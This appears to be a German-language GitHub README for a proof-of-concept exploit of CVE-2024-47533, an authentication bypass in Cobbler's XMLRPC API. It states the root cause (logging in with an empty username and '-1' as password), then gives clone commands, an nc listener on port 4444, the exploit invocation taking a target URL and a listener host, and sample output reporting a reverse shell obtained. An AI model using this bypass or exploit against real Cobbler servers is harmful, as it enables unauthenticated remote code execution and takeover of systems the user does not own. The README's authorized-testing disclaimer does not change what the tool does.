
Proof-of-Concept-Exploit für CVE-2024-47533, eine Authentifizierungsumgehung in der Cobbler-XMLRPC-API, die zu nicht authentifizierter Remote-Codeausführung und einer Reverse Shell führt.
Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2024-47533,
eine kritische Authentifizierungsumgehung in der XMLRPC-API von Cobbler, die zu unauthorisierter Remote-Codeausführung (RCE) führt.
Der Exploit nutzt den Fehler in der login()-Methode der XMLRPC-API aus, um die Authentifizierung zu umgehen und einen Reverse-Shell-Befehl über background_import() einzuschleusen.
Dieses Tool ist ausschließlich für Bildungszwecke, Forschung und autorisierte Penetrationstests bestimmt.
Verwenden Sie es NICHT auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden.
Grundursache:
utils.get_shared_secret() gibt fälschlicherweise -1 zurück, aufgrund einer fehlerhaften Handhabung von Dateilesen im Binärmodus mit einer Kodierung, was eine Authentifizierung mit einem leeren Benutzernamen und -1 als Passwort ermöglicht.
Auswirkung:
Ein Angreifer kann:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
Auf Ihrem Angriffsrechner:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Beispiel:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Reverse-Shell-Exploit-Skript
└── README.md # Dokumentation
[*] Ziel: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Verbinde zu Cobbler...
[*] Authentifiziere...
[*] Führe Exploit aus...
[+] Exploit gesendet! Shell erhalten 🔥.
00xCanelo
GitHub-Profil